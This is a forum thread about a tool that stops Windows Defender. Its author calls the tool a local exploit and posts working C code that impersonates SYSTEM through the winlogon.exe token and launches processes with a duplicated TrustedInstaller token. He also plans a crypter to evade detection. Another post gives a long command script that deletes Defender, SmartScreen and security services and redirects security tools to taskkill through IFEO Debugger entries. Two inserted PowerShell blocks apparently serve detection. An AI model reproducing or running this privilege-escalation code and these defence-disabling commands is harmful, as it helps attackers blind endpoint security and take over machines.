Stopping and starting the Windows Defender service on demand.

Discussion in 'Application Software' started by wesmar, May 16, 2023.

  1. wesmar

    wesmar MDL Novice

    Apr 1, 2012
    25
    55
    0
    #1 wesmar, May 16, 2023
    Last edited: May 17, 2023

    Attached Files:

  2. wesmar

    wesmar MDL Novice

    Apr 1, 2012
    25
    55
    0
    #2 wesmar, May 17, 2023
    Last edited: May 17, 2023
    (OP)
    Partially fixed: stopping and unloading of more on-demand drivers, as listed in the code header file:

    Code:
    #pragma once
    #include <windows.h>
    #include <iostream>
    #include <string>      // wstring / string used by the declarations below
    #include <tchar.h>
    
    using namespace std;
    
    #ifdef UNICODE
    #define get_username  get_usernameW
    #else
    #define get_username  get_usernameA
    #endif
    
    #define DEF_SERVICES_COUNT 7
    
    // Services and drivers the tool tries to stop/unload. Three of them (WdBoot,
    // WdFilter, WdNisDrv) are kernel drivers, not user-mode services, which is
    // why unloading them is handled separately from stopping the services.
    const PCTSTR DefenderServices[] = {
        TEXT("Sense"),      // Defender for Endpoint sensor service
        TEXT("WdBoot"),     // early-launch anti-malware (ELAM) boot driver
        TEXT("WdFilter"),   // file system minifilter (real-time scanning)
        TEXT("Wscsvc"),     // Windows Security Center service
        TEXT("WinDefend"),  // Defender Antivirus service (MsMpEng.exe)
        TEXT("WdNisSvc"),   // Network Inspection service (NisSrv.exe)
        TEXT("WdNisDrv"),   // Network Inspection driver
    };
    
    wstring get_usernameW();
    string get_usernameA();
    BOOL StopDefenderService();
    int GetProcessByName(PCTSTR name);
    I've read from the RFC that it's all services in Windows 11. There's no longer a need to click on start to stop Defender after a failed attempt. From the console, just invoke the program again; from Windows, click the stop button. I'll integrate all the files when I'm done. For now it is still in a testing phase, with many interesting conclusions.
    I attach a fixed, useful, but still not final version. In summary, all you need to do is replace the StopDefender.exe file.
     

    Attached Files:

  3. ohenry

    ohenry MDL Senior Member

    Aug 10, 2009
    421
    250
    10
    ESET really doesn't like cmdt. It doesn't object to NSudo, but cmdt it doesn't like.
     
  4. wesmar

    wesmar MDL Novice

    Apr 1, 2012
    25
    55
    0
    The code in cmdt.c contains three functions that perform various actions on Windows processes and services. Below is a general description of how each of them works:

    Spoofing_System: This function attempts to impersonate system-level permissions. First, it tries to set certain permissions ("SeDebugPrivilege" and "SeImpersonatePrivilege"), and then obtains the PID of the "winlogon.exe" process. It then opens this process, retrieves its token, duplicates it, and finally impersonates the logged-in user using this token. Such techniques are used in software exploits and malicious code, as impersonating system-level processes can potentially give the code top-level privileges.

    Start_TI_Service: This function attempts to start the "TrustedInstaller" service. It first opens the service control manager and then opens the "TrustedInstaller" service. Then it checks the current state of the service. If the service is stopped, it tries to start it. If the service is in a waiting state, it waits for the current operation to finish. If the service is already running, it simply returns its PID. The function handles errors at each stage and returns the corresponding error codes.

    PS_Create_As_TI: This function creates a new process using the "TrustedInstaller" service token. This allows the new process to run with the same permissions as the "TrustedInstaller" service. The function first sets the specified permissions and then opens the process with the specified PID (the PID of the "TrustedInstaller" service, which should be returned by the Start_TI_Service function). It then duplicates the process token and uses it to create a new process.

    In general, this code performs operations that are used for privilege escalation - it tries to obtain higher-level privileges by impersonating system-level processes or the "TrustedInstaller" service. Improper use of such techniques can lead to security vulnerabilities or breaches. That's why Eset warns!

    Code:
    #include <windows.h>
    
    /* Helpers defined elsewhere in cmdt.c (not shown in this post):
       Set_Permission enables a named privilege on the current process token,
       Get_PID_by_Name returns the PID of the first process with that image
       name, or 0 if none is found. */
    BOOL  Set_Permission(const wchar_t* privilegeName);
    DWORD Get_PID_by_Name(const wchar_t* imageName);
    
    /* Impersonate SYSTEM on the calling thread by duplicating the primary token
       of winlogon.exe. Returns 0 on success, otherwise a Win32 error code.
       (The posted version was declared void but returned values, which does
       not compile.) */
    DWORD Spoofing_System(void)
    {
        Set_Permission(L"SeDebugPrivilege");
        Set_Permission(L"SeImpersonatePrivilege");
    
        /* 'auto' is a storage-class specifier in C, not a type */
        DWORD systemPid = Get_PID_by_Name(L"winlogon.exe");
        if (systemPid == 0)
        {
            return ERROR_NOT_FOUND;
        }
    
        HANDLE hSystemProcess;
        if ((hSystemProcess = OpenProcess(
            PROCESS_DUP_HANDLE | PROCESS_QUERY_INFORMATION,
            FALSE,
            systemPid)) == NULL)
        {
            return GetLastError();
        }
    
        HANDLE hSystemToken;
        if (!OpenProcessToken(
            hSystemProcess,
            MAXIMUM_ALLOWED,
            &hSystemToken))
        {
            /* save the error before CloseHandle can overwrite it */
            DWORD err = GetLastError();
            CloseHandle(hSystemProcess);
            return err;
        }
        CloseHandle(hSystemProcess);   /* only the token is needed from here on */
    
        HANDLE hDupToken;
        SECURITY_ATTRIBUTES tokenAttributes;
        tokenAttributes.nLength = sizeof(SECURITY_ATTRIBUTES);
        tokenAttributes.lpSecurityDescriptor = NULL;
        tokenAttributes.bInheritHandle = FALSE;
        if (!DuplicateTokenEx(
            hSystemToken,
            MAXIMUM_ALLOWED,
            &tokenAttributes,
            SecurityImpersonation,
            TokenImpersonation,
            &hDupToken))
        {
            DWORD err = GetLastError();
            CloseHandle(hSystemToken);
            return err;
        }
    
        /* Applies the impersonation token to the current thread; it stays in
           effect until RevertToSelf() is called. */
        if (!ImpersonateLoggedOnUser(hDupToken))
        {
            DWORD err = GetLastError();
            CloseHandle(hDupToken);
            CloseHandle(hSystemToken);
            return err;
        }
    
        CloseHandle(hDupToken);
        CloseHandle(hSystemToken);
        return 0;
    }
    
    /* Start the TrustedInstaller service if it is stopped and return its PID.
       On failure a Win32 error code is returned instead; PID and error code
       share the return type, so callers must treat small values with care. */
    DWORD Start_TI_Service(void)
    {
        SC_HANDLE hSCManager;
        if ((hSCManager = OpenSCManagerW(
            NULL,
            SERVICES_ACTIVE_DATABASE,
            GENERIC_EXECUTE)) == NULL)
        {
            return GetLastError();
        }
    
        SC_HANDLE hService;
        if ((hService = OpenServiceW(
            hSCManager,
            L"TrustedInstaller",
            GENERIC_READ | GENERIC_EXECUTE)) == NULL)   /* query status + start */
        {
            DWORD err = GetLastError();
            CloseServiceHandle(hSCManager);
            return err;
        }
    
        SERVICE_STATUS_PROCESS statusBuffer;
        DWORD bytesNeeded;
        DWORD result = 0;
        while (QueryServiceStatusEx(
            hService,
            SC_STATUS_PROCESS_INFO,
            (LPBYTE)&statusBuffer,
            sizeof(SERVICE_STATUS_PROCESS),
            &bytesNeeded))
        {
            if (statusBuffer.dwCurrentState == SERVICE_STOPPED)
            {
                if (!StartServiceW(hService, 0, NULL))
                {
                    result = GetLastError();
                    break;
                }
                continue;   /* re-query; the state should now be START_PENDING */
            }
            if (statusBuffer.dwCurrentState == SERVICE_START_PENDING ||
                statusBuffer.dwCurrentState == SERVICE_STOP_PENDING)
            {
                /* dwWaitHint may be 0, which would turn this into a busy loop */
                Sleep(statusBuffer.dwWaitHint ? statusBuffer.dwWaitHint : 250);
                continue;
            }
            if (statusBuffer.dwCurrentState == SERVICE_RUNNING)
            {
                result = statusBuffer.dwProcessId;
                break;
            }
            /* paused or another state: it will not reach RUNNING by itself */
            result = ERROR_INVALID_STATE;
            break;
        }
        if (result == 0)
        {
            result = GetLastError();   /* QueryServiceStatusEx itself failed */
        }
        CloseServiceHandle(hService);
        CloseServiceHandle(hSCManager);
        return result;
    }
    
    /* Create a process with a copy of TrustedInstaller's token. 'pid' is the
       value returned by Start_TI_Service; 'commandLine' must be a writable
       buffer because CreateProcessWithTokenW may modify it. Returns 0 on
       success, otherwise a Win32 error code. */
    DWORD PS_Create_As_TI(DWORD pid, wchar_t* commandLine)
    {
        Set_Permission(L"SeDebugPrivilege");
        Set_Permission(L"SeImpersonatePrivilege");
    
        /* the posted flow impersonates SYSTEM before touching the TI process;
           its result was previously ignored */
        DWORD err = Spoofing_System();
        if (err != 0)
        {
            return err;
        }
    
        HANDLE hTIProcess;
        if ((hTIProcess = OpenProcess(
            PROCESS_DUP_HANDLE | PROCESS_QUERY_INFORMATION,
            FALSE,
            pid)) == NULL)
        {
            return GetLastError();
        }
    
        HANDLE hTIToken;
        if (!OpenProcessToken(
            hTIProcess,
            MAXIMUM_ALLOWED,
            &hTIToken))
        {
            err = GetLastError();
            CloseHandle(hTIProcess);
            return err;
        }
        CloseHandle(hTIProcess);
    
        HANDLE hDupToken;
        SECURITY_ATTRIBUTES tokenAttributes;
        tokenAttributes.nLength = sizeof(SECURITY_ATTRIBUTES);
        tokenAttributes.lpSecurityDescriptor = NULL;
        tokenAttributes.bInheritHandle = FALSE;
        if (!DuplicateTokenEx(
            hTIToken,
            MAXIMUM_ALLOWED,
            &tokenAttributes,
            SecurityImpersonation,
            TokenImpersonation,
            &hDupToken))
        {
            err = GetLastError();
            CloseHandle(hTIToken);
            return err;
        }
        CloseHandle(hTIToken);
    
        STARTUPINFOW startupInfo;
        ZeroMemory(&startupInfo, sizeof(STARTUPINFOW));
        startupInfo.cb = sizeof(STARTUPINFOW);   /* required; the posted version left it 0 */
        startupInfo.lpDesktop = (LPWSTR)L"Winsta0\\Default";
        PROCESS_INFORMATION processInfo;
        ZeroMemory(&processInfo, sizeof(PROCESS_INFORMATION));
        if (!CreateProcessWithTokenW(
            hDupToken,
            LOGON_WITH_PROFILE,
            NULL,
            commandLine,
            CREATE_UNICODE_ENVIRONMENT,
            NULL,
            NULL,
            &startupInfo,
            &processInfo))
        {
            err = GetLastError();
            CloseHandle(hDupToken);
            return err;
        }
    
        /* the child keeps running; we only drop our references to it */
        CloseHandle(processInfo.hThread);
        CloseHandle(processInfo.hProcess);
        CloseHandle(hDupToken);
        return 0;
    }
    
     
  5. user469

    user469 MDL Member

    Oct 23, 2015
    121
    13
    10
    I will try it soon. I hate Windows Defender on Win 10 putting some of my files in quarantine, NirSoft ProduKey just to name one.
    Just a question, if I understand correctly: if I disable/stop the service on a PC (HDD), will it be disabled forever until I re-enable/start it?
    Even if I put the same HDD in another PC?
     
  6. vladnil

    vladnil MDL Senior Member

    Jan 19, 2019
    462
    316
    10
    #6 vladnil, May 17, 2023
    Last edited: May 17, 2023
    Removing Defender has been described dozens of times.
    Simply delete the Defender folder and, in the autostart, delete the leftover links that no longer work.

    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "Off" /f
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f
    reg add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d "0" /f
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /t REG_DWORD /d 0 /f
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v DontReportInfectionInformation /t REG_DWORD /d 1 /f
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /f
    reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t REG_DWORD /d 1 /f
    reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t REG_DWORD /d 1 /f
    reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
    reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SecHealthUI.exe" /v Debugger /t REG_SZ /d "%windir%\System32\taskkill.exe" /f
    install_wim_tweak /o /c Windows-Defender /r
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d 0 /f
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /f

    sc delete DiagTrack
    sc delete dmwappushservice
    sc delete WerSvc
    sc delete OneSyncSvc
    sc delete MessagingService
    sc delete wercplsupport
    sc delete PcaSvc
    sc config wlidsvc start=demand
    sc delete wisvc
    sc delete RetailDemo
    sc delete diagsvc
    sc delete shpamsvc
    sc delete TermService
    sc delete UmRdpService
    sc delete SessionEnv
    sc delete TroubleshootingSvc
    for /f "tokens=1" %I in ('reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "wscsvc" ^| find /i "wscsvc"') do (reg delete %I /f)
    for /f "tokens=1" %I in ('reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "OneSyncSvc" ^| find /i "OneSyncSvc"') do (reg delete %I /f)
    for /f "tokens=1" %I in ('reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "MessagingService" ^| find /i "MessagingService"') do (reg delete %I /f)
    for /f "tokens=1" %I in ('reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "PimIndexMaintenanceSvc" ^| find /i "PimIndexMaintenanceSvc"') do (reg delete %I /f)
    for /f "tokens=1" %I in ('reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "UserDataSvc" ^| find /i "UserDataSvc"') do (reg delete %I /f)
    for /f "tokens=1" %I in ('reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "UnistoreSvc" ^| find /i "UnistoreSvc"') do (reg delete %I /f)
    for /f "tokens=1" %I in ('reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "BcastDVRUserService" ^| find /i "BcastDVRUserService"') do (reg delete %I /f)
    for /f "tokens=1" %I in ('reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "Sgrmbroker" ^| find /i "Sgrmbroker"') do (reg delete %I /f)
    sc delete diagnosticshub.standardcollector.service
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Siuf\Rules" /v "NumberOfSIUFInPeriod" /t REG_DWORD /d 0 /f
    reg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Siuf\Rules" /v "PeriodInNanoSeconds" /f
    reg add "HKLM\SYSTEM\ControlSet001\Control\WMI\AutoLogger\AutoLogger-Diagtrack-Listener" /v Start /t REG_DWORD /d 0 /f
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\AppCompat" /v AITEnable /t REG_DWORD /d 0 /f
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\AppCompat" /v DisableInventory /t REG_DWORD /d 1 /f
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\AppCompat" /v DisablePCA /t REG_DWORD /d 1 /f
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\AppCompat" /v DisableUAR /t REG_DWORD /d 1 /f
    reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d 0 /f
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t REG_DWORD /d 0 /f
    reg add "HKCU\Software\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d 0 /f
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRecentDocsHistory" /t REG_DWORD /d 1 /f
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CompatTelRunner.exe" /v Debugger /t REG_SZ /d "%windir%\System32\taskkill.exe" /f
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DeviceCensus.exe" /v Debugger /t REG_SZ /d "%windir%\System32\taskkill.exe" /f

    schtasks /Change /TN "Microsoft\Windows\AppID\SmartScreenSpecific" /disable
    schtasks /Change /TN "Microsoft\Windows\Application Experience\AitAgent" /disable
    schtasks /Change /TN "Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser" /disable
    schtasks /Change /TN "Microsoft\Windows\Application Experience\ProgramDataUpdater" /disable
    schtasks /Change /TN "Microsoft\Windows\Application Experience\StartupAppTask" /disable
    schtasks /Change /TN "Microsoft\Windows\Autochk\Proxy" /disable
    schtasks /Change /TN "Microsoft\Windows\CloudExperienceHost\CreateObjectTask" /disable
    schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\BthSQM" /disable
    schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\Consolidator" /disable
    schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\KernelCeipTask" /disable
    schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader" /disable
    schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\UsbCeip" /disable
    schtasks /Change /TN "Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector" /disable
    schtasks /Change /TN "Microsoft\Windows\DiskFootprint\Diagnostics" /disable
    schtasks /Change /TN "Microsoft\Windows\FileHistory\File History (maintenance mode)" /disable
    schtasks /Change /TN "Microsoft\Windows\Maintenance\WinSAT" /disable
    schtasks /Change /TN "Microsoft\Windows\PI\Sqm-Tasks" /disable
    schtasks /Change /TN "Microsoft\Windows\Power Efficiency Diagnostics\AnalyzeSystem" /disable
    schtasks /Change /TN "Microsoft\Windows\Shell\FamilySafetyMonitor" /disable
    schtasks /Change /TN "Microsoft\Windows\Shell\FamilySafetyRefresh" /disable
    schtasks /Change /TN "Microsoft\Windows\Shell\FamilySafetyUpload" /disable
    schtasks /Change /TN "Microsoft\Windows\Windows Error Reporting\QueueReporting" /disable
    schtasks /Change /TN "Microsoft\Windows\WindowsUpdate\Automatic App Update" /disable
    schtasks /Change /TN "Microsoft\Windows\License Manager\TempSignedLicenseExchange" /disable
    schtasks /Change /TN "Microsoft\Windows\Clip\License Validation" /disable
    schtasks /Change /TN "\Microsoft\Windows\ApplicationData\DsSvcCleanup" /disable
    schtasks /Change /TN "\Microsoft\Windows\Power Efficiency Diagnostics\AnalyzeSystem" /disable
    schtasks /Change /TN "\Microsoft\Windows\PushToInstall\LoginCheck" /disable
    schtasks /Change /TN "\Microsoft\Windows\PushToInstall\Registration" /disable
    schtasks /Change /TN "\Microsoft\Windows\Shell\FamilySafetyMonitor" /disable
    schtasks /Change /TN "\Microsoft\Windows\Shell\FamilySafetyMonitorToastTask" /disable
    schtasks /Change /TN "\Microsoft\Windows\Shell\FamilySafetyRefreshTask" /disable
    schtasks /Change /TN "\Microsoft\Windows\Subscription\EnableLicenseAcquisition" /disable
    schtasks /Change /TN "\Microsoft\Windows\Subscription\LicenseAcquisition" /disable
    schtasks /Change /TN "\Microsoft\Windows\Diagnosis\RecommendedTroubleshootingScanner" /disable
    schtasks /Change /TN "\Microsoft\Windows\Diagnosis\Scheduled" /disable
    schtasks /Change /TN "\Microsoft\Windows\NetTrace\GatherNetworkInfo" /disable
    del /F /Q "C:\Windows\System32\Tasks\Microsoft\Windows\SettingSync\*"
     
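    Added here as an example, not part of vladnil's post or of the StopDefender tool: a PowerShell audit that checks a host for the markers the script above leaves behind (the policy values it writes, the service keys it deletes, the Image File Execution Options "Debugger" entries that redirect SecHealthUI.exe, CompatTelRunner.exe and DeviceCensus.exe to taskkill.exe), so an incident responder can tell a Defender that was switched off by this kind of script from one that is merely idle. It assumes an elevated PowerShell on Windows 10/11; the paths and value names are taken from the commands above, the function names are my own, and the note about the Sense key only existing on editions that ship the Defender for Endpoint sensor is an assumption.

```powershell
# Added example: audit a host for the changes made by the script above
# (not code from the thread). Assumes an elevated PowerShell on Windows 10/11.
#Requires -RunAsAdministrator

function Get-RegValueOrNull {
    param([string]$Path, [string]$Name)
    # Returns $null when the key or the value does not exist, the value otherwise.
    $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return $item.$Name
}

function Get-DefenderTamperIndicators {
    $ifeo = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
    # 'Bad' is the value the script above writes; $null means any value at all is
    # suspicious (an IFEO Debugger pointing anywhere kills the target on launch).
    $valueChecks = @(
        @{ What = 'Policy DisableAntiSpyware';   Path = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender';        Name = 'DisableAntiSpyware'; Bad = 1 }
        @{ What = 'Policy SpyNetReporting';      Path = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet'; Name = 'SpyNetReporting';    Bad = 0 }
        @{ What = 'Policy EnableSmartScreen';    Path = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\System';          Name = 'EnableSmartScreen';  Bad = 0 }
        @{ What = 'Explorer SmartScreenEnabled'; Path = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer'; Name = 'SmartScreenEnabled'; Bad = 'Off' }
        @{ What = 'IFEO Debugger SecHealthUI.exe';     Path = "$ifeo\SecHealthUI.exe";     Name = 'Debugger'; Bad = $null }
        @{ What = 'IFEO Debugger CompatTelRunner.exe'; Path = "$ifeo\CompatTelRunner.exe"; Name = 'Debugger'; Bad = $null }
        @{ What = 'IFEO Debugger DeviceCensus.exe';    Path = "$ifeo\DeviceCensus.exe";    Name = 'Debugger'; Bad = $null }
    )
    foreach ($c in $valueChecks) {
        $value = Get-RegValueOrNull -Path $c.Path -Name $c.Name
        if ($null -eq $value)     { $flag = $false }
        elseif ($null -eq $c.Bad) { $flag = $true }
        else                      { $flag = ("$value" -eq "$($c.Bad)") }
        [pscustomobject]@{ Check = $c.What; Value = $value; Suspicious = $flag }
    }

    # Services the script deletes outright: the missing service key is the indicator.
    # Assumption: Sense only exists on editions with the Defender for Endpoint sensor,
    # so a missing Sense key is a weak signal on Home editions.
    foreach ($svc in 'Sense', 'SecurityHealthService', 'wscsvc') {
        $present = Test-Path "HKLM:\SYSTEM\CurrentControlSet\Services\$svc"
        [pscustomobject]@{ Check = "Service key $svc present"; Value = $present; Suspicious = (-not $present) }
    }

    # Run-key entry for the Security Health tray icon, which the script removes.
    $run = Get-RegValueOrNull -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealth'
    [pscustomobject]@{ Check = 'Run\SecurityHealth present'; Value = $run; Suspicious = ($null -eq $run) }
}

Get-DefenderTamperIndicators | Format-Table -AutoSize -Wrap
```

    Each row marks one of the script's changes as present or not; a host with several "Suspicious = True" rows has been through this script or one like it, and the IFEO rows in particular are worth preserving as evidence because taskkill.exe registered as a debugger is a classic persistence-style defence-evasion marker rather than a legitimate configuration.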
  7. wesmar

    wesmar MDL Novice

    Apr 1, 2012
    25
    55
    0
    I don't know if you have all read the article. I tested DefCon and nothing has changed. Tamper Protection must be turned off. In my case it doesn't have to be, because why should it? I can add an option to make the program work in service mode and permanently disable Defender. However, that was not the concept. From the beginning I created two versions, of which the console version is the most important, because despite numerous restrictions it allows someone with administrator rights on a remote machine in the network to disable Defender (and more). A convenience for administrators of server versions, etc. This program is actually a local exploit that impersonates trusted Microsoft services/processes. I know more or less how the next systems will turn out. If the Tamper Protection option becomes unmovable with the Secure Boot flag, you have a problem. I'm also working on a decent installer that bypasses first-run protection and exception creation. If I succeed, I will post it. The disabling option is a much-discussed topic, and there is no need to fry another thread on it. The option to stop this type of service is another story.

    Those who are well acquainted with psexec from the PsTools stable know what powers this program has.

    (screenshot: upload_2023-5-17_23-7-25.png)
     
  8. wesmar

    wesmar MDL Novice

    Apr 1, 2012
    25
    55
    0
    #8 wesmar, May 19, 2023
    Last edited: May 19, 2023
    (OP)
    Released version 1.03.
    Added automatic exception insertion into trusted programs, regardless of file name and location. Passes the Tamper Protection test; nothing needs to be changed. Version 1.04 will get a non-standard PE crypter to make the program as undetectable as possible. For the x64 version, the program is downloaded from the x64 folder.
    Best regards, Marek
    P.S. multilingual installer on YT
    P.S. 2: if one starts it with user rights, the new GUI (StopDefenderGui.zip) will ask for an administrator, otherwise restarting the service would not be possible.
     

    Attached Files:

  9. Dark Dinosaur

    Dark Dinosaur X Æ A-12

    Feb 2, 2011
    3,702
    5,105
    120
    I am still not able to understand.
    If I open cmd with NSudo[*] and try to execute such a command,
    kill service WinDefend bla bla ... it will fail.
    What did you do to make it succeed?

    [*] NSudoLC.exe -U:T -P:E

    (screenshots: upload_2023-5-19_21-14-56.png, upload_2023-5-19_21-14-47.png)
     
  10. wesmar

    wesmar MDL Novice

    Apr 1, 2012
    25
    55
    0
    Stopping or modifying Windows Defender requires system-level permissions, which are reserved for the TrustedInstaller account. But in Windows 10/11, if you impersonate TrustedInstaller, you have to push through other security layers that prevent such actions.

    Mandatory Integrity Control (MIC) is one such layer; it pigeonholes objects (such as files or processes) into different integrity levels (low, medium, high, system), thus limiting interactions between them.

    Discretionary Access Control (DAC) is another layer of security that allows the owner of an object to decide who has access to it. This control is more granular and allows you to specify precisely which user accounts and groups have access to specific objects and what operations they can perform on them.

    In Windows 11, Microsoft also uses techniques such as Control Flow Guard (CFG), which prevents attacks that modify a program's control flow, and Device Guard, which restricts the system to running only trusted software.

    Writing such an exploit gets heavily complicated, and the system is difficult to circumvent; just impersonating TrustedInstaller is not enough.

    The code I've shown is an example of how to get the privileges of a Windows user who has the ability to stop the Windows Defender service. The program does this by manipulating process security tokens.

    The main steps of this code are:

    1. Use the ImpersonateProcessTokenByName() function to find the winlogon.exe system process, which has high privileges, and pretend to be it; ImpersonateLoggedOnUser() allows the current thread to operate from the winlogon.exe perspective.

    2. Call ImpersonateProcessTokenByName() again, but this time to pretend to be the lsass.exe process. lsass.exe is the system process responsible for system security, including user authorization and authentication.

    3. Use the CreateTokenWinDefend() function to create a new token that authenticates the process as having the privileges of the "WinDefend" and "TrustedInstaller" services. This is crucial, because these services have permission to stop the Windows Defender service.

    4. Impersonate using the token created in the previous step via ImpersonateLoggedOnUser(). At this point, the current process is running from the perspective of the "WinDefend" and "TrustedInstaller" services.

    5. Stop the Windows Defender service via the StopDefenderService() function. This is possible thanks to the permissions the program acquired in the previous steps.

    Now I think everything is clear :)
     
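    Added example, not code from the thread or from cmdt.c: the hunting checks a defender would run for the token technique described in posts #4 and #10. A process created from a duplicated TrustedInstaller token runs under the virtual account NT SERVICE\TrustedInstaller, so any process other than TrustedInstaller.exe carrying that user name is the visible trace of a PS_Create_As_TI-style launch; the TrustedInstaller service being up on a machine that is not servicing Windows, and a Service Control Manager 7036 "entered the stopped state" event for the Defender service, are the other two traces. The script assumes an elevated Windows PowerShell 5.1 or PowerShell 7 on Windows 10/11 (Get-Process -IncludeUserName needs administrator rights); the function names are my own.

```powershell
# Added example: hunting checks for TrustedInstaller token abuse
# (not code from the thread). Assumes an elevated PowerShell on Windows 10/11.
#Requires -RunAsAdministrator

function Get-TrustedInstallerProcesses {
    # A process started with a duplicated TI token (CreateProcessWithTokenW)
    # carries the service's virtual account as its token user. TrustedInstaller.exe
    # itself is the only legitimate holder, so anything else with that user is
    # worth triage.
    $tiUser = 'NT SERVICE\TrustedInstaller'
    Get-Process -IncludeUserName -ErrorAction SilentlyContinue |
        Where-Object { $_.UserName -eq $tiUser -and $_.ProcessName -ne 'TrustedInstaller' } |
        Select-Object Id, ProcessName, Path, StartTime, UserName
}

function Get-TrustedInstallerServiceState {
    # Start_TI_Service in post #4 has to start this service first; on a machine
    # that is not installing updates it is normally Stopped with StartMode Manual.
    Get-CimInstance Win32_Service -Filter "Name='TrustedInstaller'" |
        Select-Object Name, State, StartMode, ProcessId
}

function Get-DefenderServiceStopEvents {
    param([int]$Hours = 24)
    # Service Control Manager event 7036 records every service state transition.
    # The message uses the display name, which differs between builds
    # ("Windows Defender Antivirus Service", "Microsoft Defender Antivirus Service"),
    # hence the loose match on "Defender".
    $filter = @{
        LogName      = 'System'
        ProviderName = 'Service Control Manager'
        Id           = 7036
        StartTime    = (Get-Date).AddHours(-$Hours)
    }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match 'Defender' -and $_.Message -match 'stopped state' } |
        Select-Object TimeCreated, Message
}

Get-TrustedInstallerServiceState | Format-Table -AutoSize
Get-TrustedInstallerProcesses    | Format-Table -AutoSize
Get-DefenderServiceStopEvents    | Format-Table -AutoSize -Wrap
```

    The first two checks are point-in-time and only catch a launched process that is still alive, so the 7036 query is the one to keep in a scheduled hunt; a Defender service stop that no administrator scheduled, preceded by TrustedInstaller coming up outside a servicing window, is the sequence this thread's tool produces.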
  11. thizito

    thizito MDL Novice

    Oct 23, 2017
    1
    0
    0
    I have never posted on this forum, despite looking at it a lot and having an account from 2017,
    but this is the first time I've seen someone really doing the job with excellence, gz.
    Sadly it is not long-term due to driver signing; you have already done too much, but is there a possibility to not require a driver?
     
  12. cbsvitzer

    cbsvitzer MDL Member

    Feb 4, 2010
    199
    133
    10
    Please don't give virus creators good ideas :)
     
  13. Dark Dinosaur

    Dark Dinosaur X Æ A-12

    Feb 2, 2011
    3,702
    5,105
    120
    They can get this idea alone .. :p
     
  14. ungoda

    ungoda MDL Novice

    Apr 13, 2017
    5
    2
    0
    Tested StopDefender.exe (SHA256 0105CA52020C18538D883EC4F11B04EE8488DE3C1414CFE0DFA130E89E8D4206) and it did work.
    The GUI always stated it was running, but anyway.
    Before running the tool, I disabled the real time protection and the tamper protection in Windows Security Center.
    After using this tool I edited the group policy to disable Defender.
    After a restart it tells me Defender is not active and the process is also gone. Group policy was not reverted.

    Windows 10 IoT Enterprise LTSC Version 21H2

    Thank you
     
  15. alorsnon

